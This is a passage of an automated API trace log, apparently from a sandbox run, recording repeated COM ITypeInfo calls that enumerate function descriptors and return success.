ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x84, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x85, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x86, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x87, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x88, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x89, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8a, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8b, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8c, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8d, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8e, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x8f, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x90, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x91, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x92, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x93, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.338] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x94, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.338] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x95, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x96, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x97, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x98, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x99, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9a, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9b, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9c, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9d, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9e, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0x9f, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa0, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa1, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa2, ppFuncDesc=0x145ba8, pDummy=0x460 | out: ppFuncDesc=0x145ba8, pDummy=0x460) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa3, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa4, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa5, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.339] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.339] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa6, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa7, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa8, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xa9, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xaa, ppFuncDesc=0x145ba8, pDummy=0x460 | out: ppFuncDesc=0x145ba8, pDummy=0x460) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xab, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xac, ppFuncDesc=0x145ba8, pDummy=0x460 | out: ppFuncDesc=0x145ba8, pDummy=0x460) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xad, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xae, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xaf, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb0, ppFuncDesc=0x145ba8, pDummy=0x460 | out: ppFuncDesc=0x145ba8, pDummy=0x460) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb1, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb2, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb3, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb4, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb5, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb6, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.340] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb7, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.340] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb8, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xb9, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xba, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbb, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbc, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbd, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbe, ppFuncDesc=0x145ba8, pDummy=0x460 | out: ppFuncDesc=0x145ba8, pDummy=0x460) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xbf, ppFuncDesc=0x145ba8, pDummy=0x460 | out: ppFuncDesc=0x145ba8, pDummy=0x460) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc0, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc1, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc2, ppFuncDesc=0x145ba8, pDummy=0x460 | out: ppFuncDesc=0x145ba8, pDummy=0x460) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc3, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc4, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc5, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc6, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc7, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc8, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.341] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.341] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xc9, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xca, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcb, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcc, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcd, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xce, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xcf, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd0, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd1, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd2, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd3, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd4, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd5, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd6, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd7, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd8, ppFuncDesc=0x145ba8, pDummy=0x110 | out: ppFuncDesc=0x145ba8, pDummy=0x110) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xd9, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.342] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xda, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.342] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdb, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdc, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdd, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xde, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xdf, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe0, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe1, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe2, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe3, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe4, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe5, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe6, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe7, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe8, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xe9, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) 